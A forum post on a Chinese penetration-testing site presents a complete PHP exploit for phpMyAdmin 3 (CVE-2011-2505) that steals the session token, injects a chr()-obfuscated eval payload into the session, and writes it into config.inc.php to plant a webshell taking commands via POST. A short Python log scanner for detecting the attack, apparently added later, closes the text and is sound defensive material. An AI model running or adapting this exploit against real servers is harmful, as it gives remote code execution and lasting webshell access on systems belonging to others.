China Network Penetration Testing Alliance

Title: phpMyAdmin3 remote code execute PHP version exploit

Author: admin    Time: 2013-2-21 09:13
Title: phpMyAdmin3 remote code execute PHP version exploit
I've recently been a full-time stay-at-home dad and have been out of the loop on the scene for many months; the blog hasn't been updated either.

Last night I was up all night with the kid and saw Hei Ge's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't read the vulnerable code before, but a while ago I had seen wofeiwo's exp on Weibo. Hei Ge said there was a way to exploit it that isn't so jilei (of marginal use), so during the night I dug out the code and went over it, and wrote this rehashed exp. Since I got to it late, plenty of people had already studied it and written exps, so mine is reheating leftovers; treat it as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos again to the diligence of wofeiwo and superhei, role models to learn from. But that earlier exp has some limitations when used:
First, session.auto_start = 1 is required;
Second, in the default pma3 code the libraries directory is already protected by .htaccess and cannot be accessed.
And of course there is a third point, a gap nobody can get past: the config directory must exist and be writable.

After reading Hei Ge's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really doesn't have to be so jilei.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
// crude check: looks for the 404 status anywhere in the raw response
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// the session cookie and the token both appear in the index.php response
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=isset($resp[3])?$resp[3]:'';
$sessionid=isset($resp[1])?$resp[1]:'';
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);
// Actually, almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
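From the defender's side, the requests the exp above sends leave a recognisable trace in the web server's access log. The following Python script is an added example (not part of the original post) that flags the session_to_unset + _SESSION[...] query and the follow-up POST to setup/config.php over a few constructed log lines; the IPs, timestamps and token value are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (common log format), NOT taken from the
# original post: a benign hit, the session-poisoning GET described above, the
# follow-up POST to the setup page, and an ordinary db_create.php request.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/index.php HTTP/1.1" 200 5123
203.0.113.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/db_create.php?token=abcdef0123456789abcdef0123456789&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102));/*][host]=t00ls.net HTTP/1.1" 200 412
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 98
198.51.100.7 - - [21/Feb/2013:09:14:00 +0800] "GET /pma/db_create.php?token=abcdef0123456789abcdef0123456789&db=test HTTP/1.1" 200 300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the findings for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = urlsplit(m.group('target'))
    # parse_qsl URL-decodes keys, so %5B / %2A encoded variants are caught too.
    keys = [k for k, _ in parse_qsl(target.query, keep_blank_values=True)]
    session_keys = [k for k in keys if k.startswith('_SESSION[')]
    findings = []
    if 'session_to_unset' in keys and session_keys:
        # session_to_unset plus _SESSION[...] parameters is the request shape
        # that writes attacker-chosen values into $_SESSION (CVE-2011-2505).
        findings.append('session_to_unset with _SESSION[...] parameters')
    if any(k.startswith('_SESSION[ConfigFile]') and ('*/' in k or '/*' in k)
           for k in session_keys):
        # ConfigFile keys are written into config.inc.php by setup/config.php;
        # comment delimiters in a key break out of the generated PHP.
        findings.append('comment delimiters inside _SESSION[ConfigFile] key')
    if m.group('method') == 'POST' and target.path.endswith('/setup/config.php'):
        # On an installed instance the setup script should not be reachable.
        findings.append('POST to setup/config.php')
    return findings

def scan(log_text):
    """Map each source IP to the findings raised across its requests."""
    hits = {}
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            ip = LOG_RE.match(line).group('ip')
            hits.setdefault(ip, []).extend(findings)
    return hits
```

Running scan(SAMPLE_LOG) groups all three findings under the single source IP that issued the poisoning request and the setup POST; the two ordinary requests raise nothing.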
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2